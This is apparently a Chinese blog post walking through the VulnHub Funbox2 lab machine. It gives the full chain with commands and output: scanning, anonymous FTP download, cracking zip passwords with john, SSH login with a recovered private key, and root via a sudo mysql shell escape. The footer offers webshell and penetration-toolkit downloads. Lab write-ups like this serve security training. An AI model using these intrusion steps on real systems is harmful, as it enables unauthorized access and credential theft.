声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/funbox/Funbox2.ova
内容简介:
主机发现
端口扫描
信息收集
FTP服务漏洞
密码爆破
SSH公钥认证
rbash逃逸
本地提权
1.1 主机发现
arp-scan -l1.2 端口扫描
nmap -p- 192.168.144.2221.3 信息搜集
nmap -p21,22,80 -A 192.168.144.222Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-01 22:46 EDTNmap scan report for 192.168.144.222Host is up (0.00098s latency).PORT STATE SERVICE VERSION21/tcp open ftp ProFTPD 1.3.5e| ftp-anon: Anonymous FTP login allowed (FTP code 230)| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-title: Apache2 Ubuntu Default Page: It works| http-robots.txt: 1 disallowed entry|_/logs/|_http-server-header: Apache/2.4.29 (Ubuntu)MAC Address: 08:00:27:BE:BE:5F (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.6Network Distance: 1 hopService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.98 ms 192.168.144.222OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 15.95 seconds
开启了ftp的匿名访问,程序版本ProFTPD 1.3.5e
1.4 深度信息搜集(ftp)
ftp 192.168.144.222 // 账号 anonymous 密码 空ls -lamget * //下载所有文件get . //下载隐藏文件get . //下载隐藏文件
cat . //发现 base64编码echo -n "SGkgQWRtaW5zLAoKYmUgY2FyZWZ1bGwgd2l0aCB5b3VyIGtleXMuIEZpbmQgdGhlbSBpbiAleW91cm5hbWUlLnppcC4KVGhlIHBhc3N3b3JkcyBhcmUgdGhlIG9sZCBvbmVzLgoKUmVnYXJkcwpyb290" | base64 -d//通过 base64 解码
在这些压缩包里面有可能存在管理员的key
1.5 暴力破解
解压压缩包,需要暴力破解密码
cp /usr/share/wordlists/rockyou.txt.gz .gunzip rockyou.txt.gzzip2john cathrine.zip > cathrine.hash //转换一下 实现john爆破john --wordlist=rockyou.txt cathrine.hashzip2john tom.zip > tom.hashjohn --wordlist=rockyou.txt tom.hash
压缩包 | 解压密码 |
cathrine.zip | catwoman |
tom.zip | iubire |
把他们分别解压缩发现id_rsa
1.6 SSH公钥认证
mkdir cathrineunzip cathrine.zipmv id_rsa cathrinemkdir tomunzip tom.zipmv id_rsa tomcd tom //尝试登录chmod 400 id_rsassh tom@192.168.144.222 -i id_rsa //登陆成功!
1.7 权限提升
cat .mysql_history查看到了如下_HiStOrY_V2_show\040databases;quitcreate\040database\040'support';create\040database\040support;use\040supportcreate\040table\040users;show\040tables;select\040*\040from\040support;show\040tables;select\040*\040from\040support;insert\040into\040support\040(tom,\040xx11yy22!);quit
从中发现了好像是账号tom,密码xx11yy22!
sudo -s存在rbash逃逸
sudo -l 查看可以执行所有命令,利用mysql服务进行权限提升
ps -ef | grep mysqlsudo -lsudo mysql -u tom -p //密码为 xx11yy22!\! bash
okokok
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
1、公众号后台回复:搜索大法,获取searchall工具下载链接。
2、公众号后台回复:靶场,获取靶场工具网盘下载链接。
3、公众号后台回复:webshell,获取webshell下载链接。
4、公众号后台回复:验证码,获取验证码工具下载链接。
5.公众号后台回复:应急响应,获取应急响应网盘下载链接。
6.公众号后台回复:CS,获取CS渗透工具包网盘下载链接。
7.公众号点菜单栏"工具合集",后台回复"嗨"即可获取!
